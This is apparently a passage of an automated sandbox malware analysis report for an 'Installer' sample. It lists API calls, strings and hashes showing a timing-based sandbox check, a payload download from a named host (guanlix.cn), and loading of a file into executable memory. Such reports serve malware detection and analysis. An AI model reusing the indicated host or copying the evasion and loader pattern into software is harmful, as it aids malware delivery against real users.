CloseHandle.KERNEL32(00000000), ref: 00DC1277

Strings

sandbox!!!, xrefs: 00DC1222
v4:%d, xrefs: 00DC120C
C:\Users\Public\Downloads\ind.cod, xrefs: 00DC123F

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
String ID: C:\Users\Public\Downloads\ind.cod$sandbox!!!$v4:%d
API String ID: 1694741105-2571094725
Opcode ID: f70cca19f321a54023355d36b75e773eab9b248a6e6ae13df366eefbd3cebf04
Instruction ID: 005dfd39f032795c3166846b915f055a9d5a932cd741fe68b1da3b678b528f1e
Opcode Fuzzy Hash: f70cca19f321a54023355d36b75e773eab9b248a6e6ae13df366eefbd3cebf04
Instruction Fuzzy Hash: 7011B4736452147FE72057F5AC69FBBBF6CDB46770F200526FA09E3290D5A15C0082B1

Function 00DC2E5D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00DC2E5D
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00DC2E79
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00DC2E96
InternetCloseHandle.WININET(?), ref: 00DC2F2A

Part of subcall function 00DC2D2E: __EH_prolog.LIBCMT ref: 00DC2D33

InternetReadFile.WININET(?,?,00001000,?), ref: 00DC2EFC
InternetCloseHandle.WININET(?), ref: 00DC2F12

Strings

Download, xrefs: 00DC2E74

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: be8a706dc78b9816416134b2332d884ef56f06751ccf03720c2441f219723180
Instruction ID: c2bbd695f547a0620431b89844843fa98141d1c35b43f46ac1c2a8f0ea67887b
Opcode Fuzzy Hash: be8a706dc78b9816416134b2332d884ef56f06751ccf03720c2441f219723180
Instruction Fuzzy Hash: 0B21F37590121AEEEF21AB90CC95FFEBB78EB04354F14016EB502B3295DA715E84CE70

Function 00DC2E58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00DC2E5D
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00DC2E79
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00DC2E96
InternetCloseHandle.WININET(?), ref: 00DC2F2A

Part of subcall function 00DC2D2E: __EH_prolog.LIBCMT ref: 00DC2D33

InternetReadFile.WININET(?,?,00001000,?), ref: 00DC2EFC
InternetCloseHandle.WININET(?), ref: 00DC2F12

Strings

Download, xrefs: 00DC2E74

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: b73d67cdc5e13ca5c7980d6f5e627c7ee7c8f0084175812345c8f328378d1b95
Instruction ID: e99fa5d96e0642772361c3ef1bfbfcc76fb5529b4b0615e352e9ab1a77fad6a7
Opcode Fuzzy Hash: b73d67cdc5e13ca5c7980d6f5e627c7ee7c8f0084175812345c8f328378d1b95
Instruction Fuzzy Hash: C411267590121AEFEB11AB94CC85FBEBB7CEB08354F14016EB502B7295C6715E84CA30

Function 0336FFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,00000002,?,0336FCB5,00000000), ref: 0336FFF5
VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,0336FCB5,00000000), ref: 03370035
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 03370068
VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 03370093
VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 033700BD

Memory Dump Source

Source File: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3360000_33-o_Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction ID: da592e09097807176b6af9aeddf418e20c5115b081c648e4d32b234a44c6f0b6
Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction Fuzzy Hash: 152195B760130A6FD774DA658CC8EBBB7ECEB84311B04083DBE46D2551EB7CE5058661

Function 00DC297F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00DC297F
_Fputc.LIBCPMT ref: 00DC29E4
_Fputc.LIBCPMT ref: 00DC2ABA

Strings

, xrefs: 00DC2A91

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: Fputc$H_prolog
String ID:
API String ID: 1896196775-3916222277
Opcode ID: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
Instruction ID: 3a7760411be59c5cd85993fcec525793bf59071dddbd8ec2e3487ae8581fe0b1
Opcode Fuzzy Hash: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
Instruction Fuzzy Hash: AE41693690160ADBCF25CA98C980FBEB7F5FF59310F24092EE552A7281DB71A944CB70

Function 033700CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 0337011B
VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 0337014E
VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 03370179
VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 033701A3

Memory Dump Source

Source File: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3360000_33-o_Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction ID: e1c23d611d779970e9d78c87c987fdb978aaf52bfabcfe340097be7222b55a49
Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction Fuzzy Hash: B52153B66047496FE374DA65CCC8E7BB7ECEB88601B04083DBA87E1551EB78E5058A60

Function 00DC2F3D Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DC1186: __time64.LIBCMT ref: 00DC118E
Part of subcall function 00DC1186: _rand.LIBCMT ref: 00DC119E
Part of subcall function 00DC1186: _rand.LIBCMT ref: 00DC11AD

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00DC2F4E

Part of subcall function 00DC2E58: __EH_prolog.LIBCMT ref: 00DC2E5D
Part of subcall function 00DC2E58: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00DC2E79
Part of subcall function 00DC2E58: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00DC2E96
Part of subcall function 00DC2E58: InternetReadFile.WININET(?,?,00001000,?), ref: 00DC2EFC
Part of subcall function 00DC2E58: InternetCloseHandle.WININET(?), ref: 00DC2F12
Part of subcall function 00DC2E58: InternetCloseHandle.WININET(?), ref: 00DC2F2A

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00DC2F6F

Part of subcall function 00DC168B: _wprintf.LIBCMT ref: 00DC169D
Part of subcall function 00DC168B: _wprintf.LIBCMT ref: 00DC16B5
Part of subcall function 00DC168B: _wprintf.LIBCMT ref: 00DC16CD
Part of subcall function 00DC168B: _wprintf.LIBCMT ref: 00DC16E5

Part of subcall function 00DC11E1: GetTickCount64.KERNEL32 ref: 00DC11EF
Part of subcall function 00DC11E1: Sleep.KERNEL32(0000012C), ref: 00DC11F9
Part of subcall function 00DC11E1: GetTickCount64.KERNEL32 ref: 00DC11FF
Part of subcall function 00DC11E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00DC1244
Part of subcall function 00DC11E1: GetFileSize.KERNEL32(00000000,00000000), ref: 00DC124E
Part of subcall function 00DC11E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00DC125F
Part of subcall function 00DC11E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DC1270
Part of subcall function 00DC11E1: CloseHandle.KERNEL32(00000000), ref: 00DC1277

Strings

http://guanlix.cn:881/33.ccp, xrefs: 00DC2F59
C:\Users\Public\Downloads\ind.cod, xrefs: 00DC2F54

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: Internet$File_wprintf$CloseHandleVirtual$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
String ID: C:\Users\Public\Downloads\ind.cod$http://guanlix.cn:881/33.ccp
API String ID: 2148924518-3625408810
Opcode ID: f197c58bd4c41969c7d61b8fb70335c4c2613ebc3074cb111642ca12e65a223a
Instruction ID: adb355503a7ccd6221c7b3f0440d827aab5047c7a61e9fc35bca3e4330e40a1f
Opcode Fuzzy Hash: f197c58bd4c41969c7d61b8fb70335c4c2613ebc3074cb111642ca12e65a223a
Instruction Fuzzy Hash: F8E0C2722C43213AF210B3B0AC0BFAA0208DB01B50F110016F204EA1C3D99618428278

Function 0336FB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0336FB8F
LoadLibraryA.KERNEL32(00000238), ref: 0336FC2C

Memory Dump Source

Source File: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3360000_33-o_Installer.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction ID: 253ffc3e255de220f5abc03bdecf8456c27f539f2c1c6c9647586b13fc25a4fe
Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction Fuzzy Hash: 6961D076901B02AFCB32EBA4DCC0AABF7E9FF05310F184919E65A49458D739F151CB51

Function 00DC5902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DCA95F: __getptd_noexit.LIBCMT ref: 00DCA95F

__lock_file.LIBCMT ref: 00DC5949

Part of subcall function 00DC50E4: __lock.LIBCMT ref: 00DC5109

__fclose_nolock.LIBCMT ref: 00DC5954

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 1e8ba5884ef3a6d2e4b09dc408bbc67d0cbb52da015e99d4f9d943402363474d
Instruction ID: 1ec6832ee7f251e85d7872fb69e3e246294d356801e62225108633e65e996e49
Opcode Fuzzy Hash: 1e8ba5884ef3a6d2e4b09dc408bbc67d0cbb52da015e99d4f9d943402363474d
Instruction Fuzzy Hash: CFF06830800B17DADB10AB689802F5E77A09F01334F15824DE4759B0D5CF78A9419E75

Function 058375E0 Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43069cd0759cb82144f3ab254e55e0df7a61f0f373cb16e9f7735dae29a55764
Instruction ID: 8d5ffc1428d2c1723f6843dcbdbdf9051332c4a09c10be55d250e27bfd35315c
Opcode Fuzzy Hash: 43069cd0759cb82144f3ab254e55e0df7a61f0f373cb16e9f7735dae29a55764
Instruction Fuzzy Hash: 1F412371D0435A8FCB04DFB9D8446AEBBF5FF89210F14896AD909E7240EB349884CBD1

Function 00DC184B Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DC18A8

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
Instruction ID: 93b0540c9037f496d652cc1e983eec6ffaccc3a3daeed352522668d37fa4741d
Opcode Fuzzy Hash: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
Instruction Fuzzy Hash: B931493990462AEFCB50CF59C844A9977B5FF0A364F18826EF82487192D370DE50CFA0

Function 05836FD5 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05837632), ref: 0583771F

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ef7ae6577eaa83924f9012dc7d9dc8ed5e068d9aecc1a402aa7a49b909480a0f
Instruction ID: b34106025863bd516bd715effe21ec5e17c81ab25aad66ccee57248b08fb30d5
Opcode Fuzzy Hash: ef7ae6577eaa83924f9012dc7d9dc8ed5e068d9aecc1a402aa7a49b909480a0f
Instruction Fuzzy Hash: 872135B1C0425A9FCB00CFAAD445ADEFBF4AF48320F15816AD818A7200D378A944CBE5

Function 00DC2D2E Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC2D33

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f2f1164aa254138a68a143262e79b00b16de3f215bfbf609aad1bb7cfe98bd76
Instruction ID: 929c0db59881e5a301fca2139055f68f004948992f240fb1366526c2a6d88c34
Opcode Fuzzy Hash: f2f1164aa254138a68a143262e79b00b16de3f215bfbf609aad1bb7cfe98bd76
Instruction Fuzzy Hash: 891116B5A10216AFDB24DF98C895EAAFBE9FF54704B14881EF446A7341C7B19D00CBB0

Function 00DC2D33 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC2D33

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cd1a8a8360c2951ece819dc3cc97b84b4dcb3c7623738e3e522a97fafa2f8cb8
Instruction ID: 67fca2e8f20edd7c992c5165dad20e4053b918df1ddb00767b3b11e960153b2a
Opcode Fuzzy Hash: cd1a8a8360c2951ece819dc3cc97b84b4dcb3c7623738e3e522a97fafa2f8cb8
Instruction Fuzzy Hash: BB1128B5A10216AFDB24DF98C895EAAFBF9FF54304B14881EE446A7341C7B19D00CBB0

Function 058376B0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05837632), ref: 0583771F

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ba2e5da472c72e0ad55a44d026c97dc1840d7c9c0fa02da6c6683ab3a9e8a86c
Instruction ID: 7945f306da26114e09129edc45cd56aeb97207c1fa2de8ed71e43d1e0a4df04e
Opcode Fuzzy Hash: ba2e5da472c72e0ad55a44d026c97dc1840d7c9c0fa02da6c6683ab3a9e8a86c
Instruction Fuzzy Hash: 831108B1C002599FDB10CFAAD4456DEFBF4EF48310F15811AD918A7640D374A954CFE1

Function 05836F64 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05837632), ref: 0583771F

Memory Dump Source

Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 700b387e8fac9b9604fabb6e21c9596bc60f430e07f88f099b476e5f0c253ec4
Instruction ID: abfed9f3868231e0a9506ea63bb02441a6b61c41b7537104100ce77c00cba73c
Opcode Fuzzy Hash: 700b387e8fac9b9604fabb6e21c9596bc60f430e07f88f099b476e5f0c253ec4
Instruction Fuzzy Hash: 821133B1C0025A9BCB10CFAAC445B9EFBF4EB48320F14812AE918A7240D378A944CFE5

Function 00DC2488 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC2488

Part of subcall function 00DC130B: std::locale::facet::_Incref.LIBCPMT ref: 00DC131E

Part of subcall function 00DC235F: __EH_prolog.LIBCMT ref: 00DC2364
Part of subcall function 00DC235F: std::_Lockit::_Lockit.LIBCPMT ref: 00DC2373
Part of subcall function 00DC235F: int.LIBCPMT ref: 00DC238A

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
Instruction ID: a98b079a346a1d3b9f92ae3ee778aab41ab3806ecaf76151a8181dfa2695308d
Opcode Fuzzy Hash: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
Instruction Fuzzy Hash: 04F06D36640266ABCB19EB64CC02FAE73A9EB25710F04402DF805D3586DBB49A5097B0

Function 00DC2483 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC2488

Part of subcall function 00DC130B: std::locale::facet::_Incref.LIBCPMT ref: 00DC131E

Part of subcall function 00DC235F: __EH_prolog.LIBCMT ref: 00DC2364
Part of subcall function 00DC235F: std::_Lockit::_Lockit.LIBCPMT ref: 00DC2373
Part of subcall function 00DC235F: int.LIBCPMT ref: 00DC238A

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: c03d5ba6c2d0cb42b3adde715832f975592e597920aa5f8b8a63c188a5aff4d8
Instruction ID: 8c2efc640e77c5370c5a23ea02b0ba8ce4d1f6109349c98842506862197b15f0
Opcode Fuzzy Hash: c03d5ba6c2d0cb42b3adde715832f975592e597920aa5f8b8a63c188a5aff4d8
Instruction Fuzzy Hash: D2F06D36600266ABCF19EB54CC02FAE73A9EB25711F04402DF805D3586DBB49A50D7B0

Function 033BD5FC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4498018309.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_33bd000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f466f250705995e97d5677610d803f120d7c87f2f24955584fd6a782c6559b9a
Instruction ID: 4e0170dfd45cbaebcc71eea5120643879557819c32dc9fb8eaeea864e524ef9b
Opcode Fuzzy Hash: f466f250705995e97d5677610d803f120d7c87f2f24955584fd6a782c6559b9a
Instruction Fuzzy Hash: D02167B1604200DFDB04EF14D9C0B66BF79FB98310F68C5A9DA0D0BA06C336D416CBA1

Function 033BD5F7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4498018309.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_33bd000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fcccb133e5ecb2f390c18e5757edc800b5d3ed9c414959ec0d90718c9fb80e1
Instruction ID: 7d0a06a6b71eadb4a890ca368e723ba65b78780fb286cf3b428dbd2a88535190
Opcode Fuzzy Hash: 1fcccb133e5ecb2f390c18e5757edc800b5d3ed9c414959ec0d90718c9fb80e1
Instruction Fuzzy Hash: EE112672504240CFCB06DF10D9C4B56BF72FB94310F28C5A9DD480B616C336D45ACBA1

Function 033BD006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4498018309.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_33bd000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12ad8e29f2145ea390d9c3e6f8588002f567143d196c15614f7ce9e777a9d842
Instruction ID: 4c4684489d850f526e2c0bda06d6c9f51e9b9c70707734a3da0e2bd1ceaa1aa9
Opcode Fuzzy Hash: 12ad8e29f2145ea390d9c3e6f8588002f567143d196c15614f7ce9e777a9d842
Instruction Fuzzy Hash: 0701297140D3809FD7128B258D94692BFB8EF53224F1984DBE9888F5A7C2795849CB72

Function 033BD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4498018309.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_33bd000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72dc3392c568ef416c44465970db70ba6570beb281da2af7f872be6eb1690ea1
Instruction ID: 83aab683ff49cdae78635a04a1bb877cb716e400a7ac19bf2a2a9bfc3e6b6085
